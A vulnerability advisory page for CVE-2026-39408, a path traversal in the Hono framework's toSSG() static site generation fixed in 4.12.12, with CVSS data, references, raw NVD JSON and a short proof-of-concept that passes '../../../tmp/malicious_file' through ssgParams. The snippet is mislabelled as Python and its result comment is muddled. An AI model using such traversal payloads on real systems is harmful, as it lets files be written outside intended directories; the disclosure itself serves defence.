CVE-2026-39408

Description

Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.12, a path traversal issue in toSSG() allows files to be written outside the configured output directory during static site generation. When using dynamic route parameters via ssgParams, specially crafted values can cause generated file paths to escape the intended output directory. This vulnerability is fixed in 4.12.12.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hono:hono:*:*:*:*:*:node.js:*:* - VULNERABLE

Hono < 4.12.12

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2026-39408: Hono Path Traversal in toSSG
// This demonstrates how a crafted parameter in ssgParams can escape the output directory.

const { Hono } = require('hono');
const { toSSG } = require('hono/ssg');

const app = new Hono();

// Vulnerable configuration example
toSSG(app, {
  // ssgParams function generates dynamic routes
  ssgParams: async () => {
    // Malicious input containing path traversal sequence
    return [
      { id: '../../../tmp/malicious_file' } 
    ];
  }
}, './dist'); // Intended output directory is './dist'

// Result:
// In vulnerable versions (< 4.12.12), this writes the file to:
// /tmp/malicious_file.html instead of ./dist/../../../tmp/malicious_file.html

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39408
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39408
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39408/
[4] VulDB https://vuldb.com/cve/CVE-2026-39408
[5] https://github.com/honojs/hono/commit/b470278920fffcfd6d76002755d6db53db827679
[6] https://github.com/honojs/hono/releases/tag/v4.12.12
[7] https://github.com/honojs/hono/security/advisories/GHSA-xf4j-xp2r-rqqx

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39408", "sourceIdentifier": "[email protected]", "published": "2026-04-08T15:16:14.823", "lastModified": "2026-04-21T18:31:11.617", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.12, a path traversal issue in toSSG() allows files to be written outside the configured output directory during static site generation. When using dynamic route parameters via ssgParams, specially crafted values can cause generated file paths to escape the intended output directory. This vulnerability is fixed in 4.12.12."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hono:hono:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "4.0.0", "versionEndIncluding": "4.12.11", "matchCriteriaId": "BF072C76-4755-4D73-ABA0-94EA89D05799"}]}]}], "references": [{"url": "https://github.com/honojs/hono/commit/b470278920fffcfd6d76002755d6db53db827679", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/honojs/hono/releases/tag/v4.12.12", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/honojs/hono/security/advisories/GHSA-xf4j-xp2r-rqqx", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}